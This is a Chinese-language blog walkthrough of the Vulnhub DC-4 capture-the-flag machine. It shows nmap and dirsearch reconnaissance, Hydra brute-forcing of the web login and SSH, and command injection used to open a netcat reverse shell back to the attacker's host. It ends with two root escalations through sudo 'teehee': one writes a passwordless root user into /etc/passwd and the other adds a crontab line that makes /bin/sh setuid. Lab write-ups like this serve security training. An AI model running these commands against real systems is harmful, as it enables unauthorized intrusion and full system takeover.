天道酬勤

【Vulnhub】— DC-4

主机发现

在kali中使用netdiscover,发现机器192.168.234.179

端口扫描

使用Nmap,利用命令nmap -sV -A 192.168.234.179 --script=vuln

root@kali:~# nmap -sV -A 192.168.234.179 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-11 19:40 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.179
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    nginx 1.15.10
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.179
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.234.179:80/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.234.179:80/login.php
|     Form id: 
|_    Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nginx/1.15.10
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:B1:DD:47 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 192.168.234.179

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.88 seconds

从扫描的结果中我们看出,目标机器开放了80端口和22端口。

我们先访问80端口,查看一下Web服务。

网站页面上很干净,没有其他的东西,让我想起两方面:

1、暴力破解

2、目录扫描

使用dirsearch脚本对其进行目录扫描,但是什么也没有发现。

$ python dirsearch.py -u http://192.168.234.179/ -e *

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 10 | Wordlist size: 6104

Error Log: H:\工具\dirsearch-master\logs\errors-20-02-11_19-50-11.log

Target: http://192.168.234.179/

[19:50:11] Starting:
[19:50:11] 400 -  158B  - /%2e%2e/google.com
[19:50:18] 302 -  704B  - /command.php  ->  index.php
[19:50:18] 301 -  170B  - /css  ->  http://192.168.234.179/css/
[19:50:21] 301 -  170B  - /images  ->  http://192.168.234.179/images/
[19:50:21] 200 -  506B  - /index.php
[19:50:21] 403 -   15B  - /INDEX.PHP
[19:50:21] 403 -   15B  - /index.PHP
[19:50:22] 302 -  206B  - /login.php  ->  index.php

Task Completed

暴力破解

那么只剩下暴力破解了,根据页面内容,猜测账号为admin

使用工具Hydra进行破解,这里我使用的是Hydra的图形版xHydra

此处的字典为/usr/share/wordlists/rockyou.txt

如果第一次使用该字典,需用使用gunzip rockyou.txt.gz,对密码字典压缩包进行解压。

此处为目标的url,冒号之后的内容为POST提交的固定格式。

/login.php:username=^USER^&password=^PASS^:S=logout

最后我们密码:

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-11 20:11:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.234.179:80/login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 192.168.234.179   login: admin   password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-11 20:11:55
<finished>

我们登录账号,admin:happy

命令执行

发现应该是有命令执行

You are currently logged in
Run Command:
·	List Files
	Disk Usage
	Disk Free

You have selected: ls -l
total 24
-rw-r--r-- 1 root root 1783 Apr  5  2019 command.php
drwxr-xr-x 2 root root 4096 Mar 24  2019 css
drwxr-xr-x 2 root root 4096 Mar 24  2019 images
-rw-r--r-- 1 root root  506 Apr  6  2019 index.php
-rw-r--r-- 1 root root 1473 Apr  7  2019 login.php
-rw-r--r-- 1 root root  663 Mar 24  2019 logout.php

这里确实可以执行命令。

既然是Linux系统,想个办法:执行我们需要的命令,并反弹shell。(嘿嘿,burp!)

执行成功。

那就反弹shell!!!

反弹shell

先在kali上开启监听,nc -lvp 7777

在burp上使用命令,nc 192.168.234.151 7777 -e /bin/bash

利用命令python -c 'import pty;pty.spawn("/bin/bash")'获取交互shell。

查看权限

www-data@dc-4:/usr/share/nginx/html$ whoami
whoami
www-data

来到/home目录下:

www-data@dc-4:/home$ ls
ls
charles  jim  sam
www-data@dc-4:/home$ cd jim
cd jim
www-data@dc-4:/home/jim$ ls
ls
backups  mbox  test.sh
www-data@dc-4:/home/jim$ cat test.sh
cat test.sh
#!/bin/bash
for i in {1..5}
do
 sleep 1
 echo "Learn bash they said."
 sleep 1
 echo "Bash is good they said."
done
 echo "But I'd rather bash my head against a brick wall."

这里应该是三个账户的信息,但是只有jim下有信息。再看一下backups

www-data@dc-4:/home/jim$ cd bac	
cd backups/
www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
……
……

应该是jim账户的密码,那就使用hydra进行破解。

root@kali:~# hydra -l jim -P passwd.txt -t 50 192.168.234.179 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-11 21:24:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 50 tasks per 1 server, overall 50 tasks, 253 login tries (l:1/p:253), ~6 tries per task
[DATA] attacking ssh://192.168.234.179:22/
[22][ssh] host: 192.168.234.179   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 47 final worker threads did not complete until end.
[ERROR] 47 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-11 21:24:42

得到密码为:jibril04

SSH登录

ssh -p 22 jim@192.168.234.179

查看mbox

jim@dc-4:/$ cd /home/jim
jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
	(envelope-from <root@dc-4>)
	id 1hCiQe-0000gc-EC
	for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

是一封来自root的邮件。

Linux中邮件存放在 /var/mail 中

jim@dc-4:~$ cd /var
jim@dc-4:/var$ ls
backups  cache  lib  local  lock  log  mail  opt  run  spool  tmp  www
jim@dc-4:/var$ cd mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from <charles@dc-4>)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

我们得到了Charles的用户密码,便切换用户。

jim@dc-4:/var/mail$ su charles
Password: 
charles@dc-4:/var/mail$ 

使用命令sudo -l查看权限

发现可以在没有root密码的情况下,执行teehee

不清楚这个teehee如何去用。便百度了。

于是,从大佬那里得到两种提权方式。

提权

第一种提权

修改passwd文件,写一个具有root权限的用户进去。

echo "hackergu::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

参数解释:

#如:admin:x:0:0::/home/admin:/bin/bash

#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]

现在我们就提权成功了。

root@dc-4:/# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

第二种提权

通过定时脚本进行脚本提权

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

时间全部写*,代表一分钟执行一次。

将/bin/sh的权限修改为4777,可以在非root用户下执行它,并且执行期间拥有root权限。

charles@dc-4:/$ echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:/$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 Jan 24  2017 /bin/sh -> dash
charles@dc-4:/$ /bin/sh
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
# 

 

参考文章:

https://blog.csdn.net/leesir98/article/details/101620077

https://www.jianshu.com/p/ac10a4149eef

 

赞(0) 打赏
未经允许不得转载:HackerGu‘s Blog » 【Vulnhub】— DC-4
分享到: 更多 (0)

评论 抢沙发

评论前必须登录!

 

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏